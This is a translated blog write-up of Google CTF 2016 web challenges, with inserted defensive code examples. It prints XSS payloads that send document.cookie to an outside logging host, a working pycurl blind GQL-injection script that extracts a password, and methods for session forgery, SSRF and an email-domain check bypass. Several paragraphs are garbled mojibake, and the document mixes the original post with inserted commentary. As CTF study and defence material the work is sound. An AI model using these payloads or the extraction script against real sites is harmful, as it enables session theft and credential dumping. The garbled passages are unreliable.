LoRexxar's Blog

google_ctf2016_writeup

2016/05/02

No dieting in May, only regret in June... (╯‵□′)╯︵┻━┻ On the first weekend of May I went nowhere at all and played Google's first-ever CTF. Overall it was fine, it's just that we ran into a lot of strange things... Not sure whether our imaginations are too limited or whether Google's programmers have written every kind of bug there is...

WEB

Wallowing Wallabies

The challenge is a series of XSS problems. Amusingly, when it had only just opened, this challenge didn't look like this at all... it seemed the environment of another problem had been deployed in its place, so we went astray a lot at the start.

https://wallowing-wallabies.ctfcompetition.com/

First we found there is a robots.txt:

User-agent: *
Disallow: /deep-blue-sea/
Disallow: /deep-blue-sea/team/
# Yes, these are alphabet puns :)
Disallow: /deep-blue-sea/team/characters HTTP:402
Disallow: /deep-blue-sea/team/paragraphs HTTP:403
Disallow: /deep-blue-sea/team/lines
Disallow: /deep-blue-sea/team/runes
Disallow: /deep-blue-sea/team/vendors

At first only the last path could be opened. The challenge hint says to use XSS to steal the cookie; opening the page reveals a message board addressed to the administrator, so it's clear what to do. Let's begin.

Part One

绗竴棰樼殑xss鐪熺殑鏄瘮杈冩壇娣★紝棰樼洰瑕佹眰蹇呴』瑕佹湁

<script src

...an opening like that. I had never seen such a requirement. Since the site has CSP enabled, external JS can't be loaded here; no matter, just append another script tag after it. Testing seemed to show that the admin couldn't communicate with the outside, so I crudely resorted to a redirect...

<script src="/js/jquery-1.12.0.min.js"></script><script>window.location="http://xss.xxxx.cc/?cookie="+document.cookie</script>

That captured the cookie, but it took a long time to find the flag; nothing to be done... the challenge's intent wasn't clear...

green-mountains=eyJub25jZSI6IjA4ZjVhNzgxZWY3MTdjMjMiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vdmVuZG9ycy4qJCIsImV4cGlyeSI6MTQ2MTk5NTc1OX0=|1461995756|4feab5409a0f36bd685bc17473cc363699790e36

Base64-decoding the first part gives
'{"nonce":"08f5a781ef717c23","allowed":"^/deep-blue-sea/team/vendors.*$","expiry":1461995759}'
We see that "allowed" covers the vendors path; adding the cookie and viewing that page gives us the flag, and also the entry point to the next part.
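As an added example (not code from the original post or from the challenge): a parser and verifier for the payload|timestamp|signature cookie layout seen above. The signing scheme and key are assumptions (HMAC-SHA1 over payload and timestamp with a made-up key); the CTF's real key is not on the page, so the page's own cookie is only parsed for structure, while a constructed, self-signed cookie exercises the full signature, expiry and allowed-path check.

```python
import base64
import hashlib
import hmac
import json
import re
import time

# Cookie value from the write-up (Part One). Its signing key is unknown, so it
# is parsed for structure only.
PAGE_COOKIE = (
    "eyJub25jZSI6IjA4ZjVhNzgxZWY3MTdjMjMiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vdmVuZG9ycy4qJCIsImV4cGlyeSI6MTQ2MTk5NTc1OX0="
    "|1461995756|4feab5409a0f36bd685bc17473cc363699790e36"
)

# Assumption: a made-up server key, used only for the constructed cookies below.
HYPOTHETICAL_KEY = b"example-green-mountains-key"


def parse_scope_cookie(value):
    """Split payload|timestamp|signature and decode the base64 JSON payload."""
    payload_b64, ts, sig = value.split("|")
    payload = json.loads(base64.b64decode(payload_b64))
    return {"payload": payload, "payload_b64": payload_b64,
            "timestamp": int(ts), "signature": sig}


def sign(payload_b64, ts, key):
    # Assumed scheme: HMAC-SHA1 over "payload|timestamp". It matches the 40-hex
    # signature length on the page, but the real construction is not shown there.
    msg = "%s|%d" % (payload_b64, ts)
    return hmac.new(key, msg.encode(), hashlib.sha1).hexdigest()


def make_scope_cookie(allowed, expiry, key, nonce="0" * 16, now=None):
    """Mint a cookie granting access to paths matching `allowed` until `expiry`."""
    ts = int(time.time() if now is None else now)
    payload = json.dumps({"nonce": nonce, "allowed": allowed, "expiry": expiry},
                         separators=(",", ":"))
    payload_b64 = base64.b64encode(payload.encode()).decode()
    return "%s|%d|%s" % (payload_b64, ts, sign(payload_b64, ts, key))


def authorize(cookie, path, key, now=None):
    """True only when signature, expiry and the allowed-path regex all pass.
    The signature is checked first so a tampered payload never reaches the regex."""
    try:
        parsed = parse_scope_cookie(cookie)
        expected = sign(parsed["payload_b64"], parsed["timestamp"], key)
        allowed = parsed["payload"]["allowed"]
        expiry = int(parsed["payload"]["expiry"])
    except (ValueError, KeyError, TypeError):
        return False
    if not hmac.compare_digest(expected, parsed["signature"]):
        return False
    now = time.time() if now is None else now
    if now > expiry:
        return False
    # The page's regexes are anchored ^...$, so re.match is a whole-path test.
    return re.match(allowed, path) is not None
```

The point of the scope-per-cookie design is that a stolen cookie only opens the one path prefix it was minted for, and only until its expiry; the verifier therefore has to check all three fields, in that order, rather than trusting the decoded JSON.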

Part Two

https://wallowing-wallabies.ctfcompetition.com/deep-blue-sea/team/vendors/msg

It's still a message board, so let's experiment. A little testing showed that anything after a "/" gets filtered, "alert" gets filtered, and an "on" attribute followed by "=" gets filtered.
Because what follows "/" is filtered, there is no way to close <script>; I tried and couldn't get around that, so I switched tags...

<svg/onload
="
window.location='http://xss.xxx.cc?'+(document.cookie)">

Here I also fell into a big pit: for some reason the bot kept going down, so it took a very long time before the cookie arrived, and I didn't notice that this cookie was different; only after waiting four or five hours did I spot the problem.

green-mountains=eyJub25jZSI6ImUxZTM5ZjcxZTBkNTVjMDQiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vY2hhcmFjdGVycy4qJCIsImV4cGlyeSI6MTQ2MjAxNDM5MX0=|1462014388|0b51ee8a5986850cf11b119a6ddd447b277dc8e1

Base64 decoding:
'{"nonce":"e1e39f71e0d55c04","allowed":"^/deep-blue-sea/team/characters.*$","expiry":1462014391}'
We see it grants permission for another path. Visiting characters gives another flag.

Part Three

I don't know why the third part was worth so many points; it really took only a few minutes...

Testing showed the filtering on the title is fairly weak; only one filter was found, on ".". The first thing was to solve the domain-name problem.

String['fromCharCode'](120, 115, 115, 46, 108, 97, 122, 121, 115, 104, 101, 101, 112, 46, 99, 99) yields the domain name. Next is the document.cookie problem: ak菊苞 told me that document can be treated like an array, i.e. document['cookie'] gets the cookie.

payload

<script>location='http:///'+String['fromCharCode'](120, 115, 115, 46, 108, 97, 122, 121, 115, 104, 101, 101, 112, 46, 99, 99)+'/?'+document['cookie'];</script>
green-mountains=eyJub25jZSI6IjkyYmIyZWE5OWYwNTdiZDgiLCJhbGxvd2VkIjoiXi9kZWVwLWJsdWUtc2VhL3RlYW0vcGFyYWdyYXBoLiokIiwiZXhwaXJ5IjoxNDYyMDE5MjAxfQ==|1462019198|287dbcc084c610e2666ac995616137577bc4c05b

Ernst Echidna

Not much to say: after registering, the cookie turns out to be the MD5 of the username, so changing it to the MD5 of admin is enough.

Spotted Quoll

The challenge is Python serialization and deserialization.
Unpacking what it gave shows the user field is None, so fill in admin and get the flag.

Purple Wombats

Opening it reveals leaked source code; the most ridiculous part is that this hint originally sat in that XSS challenge.

Source code: https://github.com/mannequin-moments/website

But the login function has been switched off, while the flag page has a decorator that checks whether you are logged in:

import functools
import webapp2


def require_login(f):
    # Only checks that the session carries a 'user' key; anyone who can mint a
    # session cookie (the secret_key shipped with the leaked source) passes.
    @functools.wraps(f)
    def wrapped(self, *args, **kwargs):
        if not self.session.get('user'):
            return webapp2.redirect('/login', response=self.response)
        return f(self, *args, **kwargs)
    return wrapped

鍙鏌ヤ簡session涓槸瀛樺湪username锛屽苟涓旂粰浜唖ecret_key锛屾湰鍦版惌寤簑ebapp2鐨勭幆澧冿紝鍦╯ession涓啓涓猽ser锛岀劧鍚庢妸session璐村洖绾夸笂鐜

get!

Dancing Dingoes

The challenge gives a site plus a username and password, and the goal is admin privileges. We searched for a long time without finding anything; later we noticed the login has a parameter of the form login?domain=xxx, and modifying it produced an error. Looking into it showed that user information is fetched from there, so we host one on our own server with
userid : admin, then request it and get the flag.

Horton Hears a Who!

Opening it shows login, registration and logout.

After a long time testing, it turned out the token simply cannot be decoded:

dd1g:0:1462086430:MI80yZoF-STfaLEp1v124i2lsquULujTJJtM61Ug2tU=
ddog:0:1462086430:O3S-RHZ7dobbKnZ_MfpSKhUf-PqirpPr852fuQ4MZ9A=
de1g:0:1462086550:AD8-7rek9ltrhb8_iLuAQ3rEvsQG0akf7LUfJOxWCRo=
deog:0:1462086550:MucH660HSiXby0hKYzXo4a0YmNtZs_c2EQnsOky1d84=
ddog:0:1462086643:v98x98PtHScKlSyjHOlIhrqb8QIzBJ_Ljd1Cybp2V_M=
dd1g:0:1462086643:iB5EBvvZ9GbZv1rl4_XeUwhCf6xf7YRe9NNDmt0zpeE=

Then I gave up; only after the end, reading write-ups, did I learn... this problem isn't solved that way at all (the programmer who wrote this bug, honestly...).

Register a username of the form admin:1:<unexpired timestamp>; then, when unpacking, in a way I don't fully understand, it gets parsed as admin...
admin:1:1462168888:0:1462168809:z7AtZXC4yJDtfiAihcQBFbGHyasFaiRZQJC3rvqtwo0=

But I still can't work out why my construction at the time, admin:1:timestamp:token, didn't pass the check (later a senior told me it picks the token by index -1, then compares against the front part of the hash, and that is what produces this bug...).

Congratulations, your flag is: CTF{huh-i-didn’t-know-you-could-do-that}
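As an added illustration of the delimiter bug described above (not the challenge's own code, whose token format is only inferred from the write-up): a signed username:is_admin:expiry:signature token, parsed once the way the senior describes it (signature taken from index -1, username and admin flag from the front of a plain split) and once with a fixed field count and a username allow-list. The key and HMAC construction are assumptions.

```python
import base64
import hashlib
import hmac
import re

# Assumption: a made-up signing key; the challenge's key is not on the page.
HYPOTHETICAL_KEY = b"example-horton-key"
# Usernames may not contain the ':' delimiter (or anything else surprising).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def _sign(body):
    mac = hmac.new(HYPOTHETICAL_KEY, body.encode(), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac).decode()


def username_ok(username):
    """Registration-time check that keeps the delimiter out of usernames."""
    return USERNAME_RE.match(username) is not None


def issue_token(username, is_admin, expiry):
    """Token layout modelled on the page: username:is_admin:expiry:signature."""
    body = "%s:%d:%d" % (username, 1 if is_admin else 0, expiry)
    return body + ":" + _sign(body)


def parse_token_vulnerable(token, now):
    """The bug as the write-up describes it: signature = split(':')[-1], and the
    username / admin flag / expiry are fields 0, 1, 2 of the same split. A
    username that itself contains ':' shifts the fields while the MAC still
    verifies, because the MAC really was computed over that whole body."""
    parts = token.split(":")
    sig = parts[-1]
    body = token[: len(token) - len(sig) - 1]
    if not hmac.compare_digest(sig, _sign(body)):
        return None
    try:
        username, is_admin, expiry = parts[0], parts[1] == "1", int(parts[2])
    except (IndexError, ValueError):
        return None
    if expiry < now:
        return None
    return {"username": username, "is_admin": is_admin}


def parse_token_fixed(token, now):
    """Verify the MAC, then split into exactly the expected number of fields and
    re-validate the username against the registration allow-list."""
    body, sep, sig = token.rpartition(":")
    if not sep or not hmac.compare_digest(sig, _sign(body)):
        return None
    try:
        username, is_admin, expiry = body.rsplit(":", 2)
        expiry = int(expiry)
    except ValueError:
        return None
    if not username_ok(username) or is_admin not in ("0", "1") or expiry < now:
        return None
    return {"username": username, "is_admin": is_admin == "1"}
```

A token registered as admin:1:1462168888 with is_admin=0 is honestly signed by the server, so the MAC offers no protection; only a parser that knows how many fields it expects, plus a registration filter on the delimiter, closes the hole.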

Flag Storage Service

Open robots.txt
and get:

User-agent: hackers
Disallow: /README.txt
Disallow: /sync
FlagService 0.01
README.txt
== Authentication ==
Authentication via username/password is the default. If another authentication
mechanism is configured, then the password field must *not* be sent to avoid
including it in the backend query. The default username is 'manager', but this
may be customized to suit your needs.
== Synchronization ==
In order to sync between multiple instances, there is a config page at
/sync that is only available to authorized applications that send the
appropriate X-FlagStore header. This header is automatically added
to all HTTP requests to partner instances.

Saw the write-up:
http://buer.haus/2016/05/01/google-ctf-web-11-flag-storage-service/

But seriously, someone worked out that this problem uses the source code of an earlier one??? How can you tell???

Testing showed there is GQL injection, but GQL has no OR clause, so at first I couldn't work out what to do.

@classmethod
def Login(cls, username, password):
    # username and password are interpolated straight into the GQL text
    query = "SELECT * FROM User WHERE username = '%s'" % username
    if password is not None:
        query += " AND password = '%s'" % password

The write-up author says they spent a long time reading the GQL docs: https://cloud.google.com/appengine/docs/python/datastore/gqlreference

And then found something interesting:
http://stackoverflow.com/questions/47786/google-app-engine-is-it-possible-to-do-a-gql-like-query

This gives a possibility of blind injection:

username=manager' AND password >='A' AND password < 'Z

Sending a request like this gives “Invalid password.” (error 1)
When testing reaches 'D', the error changes:

When we hit “D” we land on a different error: “Invalid username/password.” (error 2)

There is a script:

import pycurl
from io import BytesIO

host_url = 'https://next-bitter-flag.ctfcompetition.com/login'
password = "C"


def login(char):
    # POST one comparison probe; the response body shows which error branch was hit
    buffer = BytesIO()
    c = pycurl.Curl()
    c.setopt(c.URL, host_url)
    c.setopt(pycurl.FOLLOWLOCATION, 1)
    c.setopt(pycurl.SSL_VERIFYPEER, 0)
    c.setopt(pycurl.COOKIEJAR, 'cookie.txt')
    c.setopt(pycurl.COOKIEFILE, 'cookie.txt')
    c.setopt(pycurl.POST, 1)
    c.setopt(pycurl.POSTFIELDS, "username=manager' AND password >='" + password + char + "' AND password < 'z")
    c.setopt(c.WRITEDATA, buffer)
    c.perform()
    c.close()
    return buffer.getvalue().decode('utf-8', 'replace')


def getNextChar():
    # walk printable ASCII; the first char that flips the error is one past the real one
    for x in range(33, 126):
        body = login(chr(x))
        if "Invalid username/password." in body:
            return chr(x - 1)
    return None


while True:
    next_char = getNextChar()
    if next_char is None:
        break
    password += next_char
    print(password)
print("end")
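As an added, defender-side counterpart to the script above (not code from the write-up or from the challenge): the same Login() query built with GQL parameter binding instead of % formatting, and a small detector that flags clients sending many comparison-operator probes. The log lines are constructed for the example; with the App Engine SDK the parameterized pair would be passed to db.GqlQuery(text, *params).

```python
import re
from collections import Counter


def build_login_query_vulnerable(username, password=None):
    """Same construction as the leaked Login(): input is spliced into query text."""
    query = "SELECT * FROM User WHERE username = '%s'" % username
    if password is not None:
        query += " AND password = '%s'" % password
    return query


def build_login_query_parameterized(username, password=None):
    """Return (gql_text, params). :1 and :2 are GQL positional bindings; with the
    App Engine SDK this is db.GqlQuery(text, *params). The values are bound as
    data, so a quote or AND inside them can never change the query's structure."""
    text = "SELECT * FROM User WHERE username = :1"
    params = [username]
    if password is not None:
        text += " AND password = :2"
        params.append(password)
    return text, params


# A quote followed by "AND password <comparison>" is the shape of the probes the
# script above sends, one character of the password per request.
INJECTION_RE = re.compile(r"'\s*AND\s+password\s*(>=|<=|!=|<|>|=)", re.IGNORECASE)

# Constructed log lines for the example: client IP, TAB, submitted username field.
SAMPLE_LOG = [
    "203.0.113.5\tmanager",
    "203.0.113.9\tmanager' AND password >='CA' AND password < 'z",
    "203.0.113.9\tmanager' AND password >='CB' AND password < 'z",
    "203.0.113.9\tmanager' AND password >='CC' AND password < 'z",
    "198.51.100.7\tmanager' AND password >='A' AND password < 'Z",
    "203.0.113.5\talice",
]


def find_injection_probes(lines, threshold=3):
    """Count injection-shaped usernames per client; return those at or over threshold."""
    hits = Counter()
    for line in lines:
        ip, _, username = line.partition("\t")
        if INJECTION_RE.search(username):
            hits[ip] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}
```

The oracle the script relies on is the two distinct error messages; parameter binding removes the injection entirely, and collapsing both failures into one generic message removes the character-by-character signal even if some other query path is still flawed.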

FSS – Electric Boogaloo

http://buer.haus/2016/05/01/google-ctf-web-12-fss-electric-boogaloo/

This is the follow-up to the previous Flag Storage challenge; log in with the username and password obtained in the first one.

We find we cannot access the /sync page, probably because we lack a valid X-FlagStore header.

After logging in, the profile looks like it might have some problems.
The original write-up puts it this way:

There’s a form for uploading GnuPG keys based on a remote URL. The immediate thing that jumps to mind is Server-Side Request Forgery. I tried to put my own website in this input and sure enough, it loaded the contents of my website and displayed it back. I put the /sync endpoint into the input and got the following:

The GnuPG keys feature has a problem: it reads back the content of whatever URL is requested, so we make it read /sync and get the flag.
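As an added example of the mitigation for the SSRF above (not the challenge's own code): a fetch-target check for a user-supplied key URL. The own-hostname set and the DNS stub are constructed for the example; in a real deployment the resolver argument would be a real lookup, and the connection should then be pinned to the address that was checked.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed: hostnames this instance itself answers on, so /sync-style
# self-requests are refused even when aimed at the public name.
OWN_HOSTNAMES = {"flagstore.example.invalid"}

# Constructed offline resolver; a real deployment would pass a DNS lookup in.
STUB_DNS = {
    "keys.example.org": ["1.2.3.4"],       # constructed public address
    "internal.example.org": ["10.0.0.5"],  # resolves into RFC 1918 space
}


def _blocked_ip(ip):
    """Loopback, private, link-local (cloud metadata lives here), multicast,
    reserved and unspecified addresses are never acceptable fetch targets."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified or not ip.is_global)


def is_safe_key_url(url, resolve=STUB_DNS.get):
    """Allow only absolute http(s) URLs whose host is public and not ourselves."""
    try:
        parts = urlsplit(url)
        host = parts.hostname  # lower-cased; brackets stripped for IPv6 literals
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or not host:
        return False
    if parts.username or parts.password:  # embedded credentials are a classic confusion trick
        return False
    if host in OWN_HOSTNAMES or host == "localhost" or host.endswith(".localhost"):
        return False
    try:
        return not _blocked_ip(ipaddress.ip_address(host))
    except ValueError:
        pass  # not an IP literal, resolve it
    addrs = resolve(host) or []
    if not addrs:
        return False
    # Every address must be acceptable; a mixed answer is a rebinding smell.
    return all(not _blocked_ip(ipaddress.ip_address(a)) for a in addrs)
```

Relative paths such as /sync fail the scheme test, loopback and metadata addresses fail the IP test, and the instance's own hostname is refused outright; a redirect returned by the fetched server must be re-checked with the same function before being followed.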

Weedy Sea Dragon

The challenge says:
It’s feared that their authentication and authorization check is implemented wrongly.

Opening the page automatically logs you in with your Google account, then tells you that you don't have permission to access it.

Hint:
Access to this service is restricted to @ctfcompetition.com accounts only.
Access from gmail.com accounts is prohibited

Roughly, it means you have to come from ctfcompetition.com to see it.
What follows is from this person's write-up: http://blog.eqoe.cn/posts/google-ctf-2016-part2.html

Guessing that the email address check is done by containment rather than a hard-coded exact match, then:
We open our domain management, add an MX record for ctfcompetition.com.yourdomain, and listen on port 25 on the server.

Register a new Google account as ctfcompetition.com@ctfcompetition.com.yourdomain, then log in to the target page again to obtain the flag.

...
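As an added example of the check the write-up infers (not the challenge's code, which is not shown on the page): the containment-style test that the bypass above defeats, next to an exact-domain comparison that rejects ctfcompetition.com@ctfcompetition.com.yourdomain.

```python
ALLOWED_DOMAINS = {"ctfcompetition.com"}
DENIED_DOMAINS = {"gmail.com"}


def allowed_by_substring(email):
    """The kind of check the bypass implies: the allowed domain only has to
    appear somewhere in the address, so it can be placed in the local part."""
    return (any(d in email for d in ALLOWED_DOMAINS)
            and not any(d in email for d in DENIED_DOMAINS))


def account_domain(email):
    """Return the normalised domain after the single '@', or None if malformed."""
    if email.count("@") != 1:
        return None
    local, _, domain = email.partition("@")
    domain = domain.strip().lower().rstrip(".")
    if not local or not domain:
        return None
    return domain


def allowed_by_exact_domain(email):
    """Compare the whole domain, case-insensitively, against the allow-list.
    The deny-list becomes redundant: anything not on the allow-list is refused."""
    domain = account_domain(email)
    return domain is not None and domain in ALLOWED_DOMAINS
```

The same principle applies to the domain parameter in Dancing Dingoes above: a value that is looked up or compared must be matched whole against an allow-list, never tested for whether it merely contains an expected string.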

Global CTF

Description:
Can you break into this CTF website? Features Two Factor Authentication for unbeatable security.

For this one I read this write-up; I didn't solve it myself...
http://buer.haus/2016/05/01/google-ctf-web-8-global-ctf/

Interestingly, this challenge really is a CTF platform: https://github.com/Nakiami/mellivora
That is, inside Google's challenge there is yet another CTF platform.

As the author tells it, he set up the platform locally and searched it page by page, but didn't find any problem (same as us).
But...
Nothing interesting. So I move on and eventually click on my Profile page.

I’m all of a sudden logged in as the admin and there is the flag:


After testing he found that if you use the request at /recruit, it changes your user session and you can be logged in as a different user...

I created a new account and walked through the steps again to verify. Indeed, any time you use the /recruit request you change your current user session logging you into a different account.
I’ll have to revisit this later because it doesn’t seem like the intended solution or I missed something obvious.

...okay then...

Geokitties

Blast from the past. Prepare to enter a world of early 90’s HTML, complete with background music. Visit GeoKitties today!

I didn't look at this challenge, but found a write-up that says:

'post_id=1&comment=<a href="javascript:location=\'http://domain/\'%2bdocument.cookie" onclick="">'
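The payload above works because the comment form accepts any href value. As an added example (not Geokitties' own code): a link sanitizer for user-submitted comments that decodes entities, strips the characters browsers ignore inside a scheme, and keeps only http, https and same-origin relative links.

```python
import html
import re
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https"}


def safe_href(value):
    """Return a cleaned href, or None if the link must not be emitted."""
    # Browsers decode entities first, then ignore tab/newline/CR anywhere in the
    # URL and leading/trailing C0 controls and spaces; mirror that before parsing
    # so "java&#9;script:" cannot sneak past a naive prefix check.
    cleaned = html.unescape(value)
    cleaned = re.sub(r"[\t\r\n]", "", cleaned)
    cleaned = re.sub(r"^[\x00-\x20]+|[\x00-\x20]+$", "", cleaned)
    try:
        parts = urlsplit(cleaned)
    except ValueError:
        return None
    if parts.scheme:
        if parts.scheme.lower() not in SAFE_SCHEMES:
            return None
    elif cleaned.startswith("//"):
        return None  # protocol-relative links point off-site; require an explicit scheme
    return cleaned


def render_comment_link(href, text):
    """Emit an <a> for a safe href, otherwise just the escaped link text."""
    cleaned = safe_href(href)
    if cleaned is None:
        return html.escape(text)
    return '<a href="%s" rel="nofollow noopener">%s</a>' % (
        html.escape(cleaned, quote=True), html.escape(text))
```

Scheme allow-listing is the durable fix: a deny-list of "javascript" misses case tricks, entity-encoded letters and the other executable schemes, whereas only ever emitting http, https or relative paths leaves nothing for the onclick-less payload above to ride on.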

networking

杩欐google閬囧埌浜嗕竴绫绘病瑙佽繃鐨勯鐩紝鍙玭etworking锛岄槦閲屾病浜轰細鍋氥傘傘傝创涓婂ぇ绁炵殑wp锛屼互鍚庡涔

http://blog.eqoe.cn/posts/google-ctf-2016-part1.html
